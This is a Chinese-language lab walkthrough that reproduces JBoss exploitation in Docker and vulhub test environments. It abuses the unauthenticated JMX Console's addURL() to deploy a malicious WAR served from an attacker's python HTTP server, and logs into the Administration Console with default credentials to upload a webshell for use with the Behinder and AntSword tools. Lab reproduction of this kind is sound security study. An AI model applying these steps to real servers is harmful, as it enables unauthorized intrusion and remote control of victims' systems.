文章目录
JBoss 未授权访问和弱口令复现
JBoss简介
一个基于J2EE的开放源代码的应用服务器 。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。Jboss是Java EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。
JMX Console 未授权访问漏洞
环境搭建
docker search testjboss
docker pull testjboss/jboss
docker run -p 8080:8080 -d testjboss/jboss
JBoss框架的常见页面如下。
复现过程
1.访问它的后台页面 ,可以直接进入它的后台, 如果要登录账号和密码都是admin。
http://192.168.42.132:8080/jmx-console/
2.找到jboss.deployment,进入后找到 void addURL() ,有两个,选择java.lang .String 那个去填写恶意文件的网址。
3.攻击机上用python开启http服务,在路径上输入恶意文件的位置,然后点击invoke。会发现部署成功,就返回上一层点击apply 。
//开启http服务
python3 -m http.server
//打包war 包
jar -cvf yijian.war yijian.jsp
//文件所在位置
http://192.168.3.18:8000/yijian.war
4.会然后攻击机上开启服务就会接收到请求,成功则显示200.也可以再返回上一层,找到jboss.web.deployment 查看是否部署成功。
5.成功后就访问地址,用webshell管理工具,但后面发现蚁剑的shell不行,得用冰蝎去连接。(步骤和前面一样) 发现部署失败或者连接不到上传的shell,就重启靶场,按步骤用冰蝎的shell.jsp上线即可。
http://192.168.42.132:8000/shell/shell.jsp
Jboss弱口令Getshell
漏洞简介
JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub 。如果Administration Console可以登录,就可以在后台部署war包。
环境搭建
在vulhub上找到jboss,然后开启它就可以了。
复现过程
1.访问地址,点击administration console ,在弹窗上输入账号和密码 admin /vulhub 。
2.点击war那,进行 add 。选择上面未授权靶场利用到的冰蝎shell.jsp打包生成的shell.war 进行上传。
3.成功部署后,点击content,继续选择shell.war 恶意文件进行上传。
4.访问上传的木马文件,用冰蝎进行连接。
http://ip:8080/shell/shell.jsp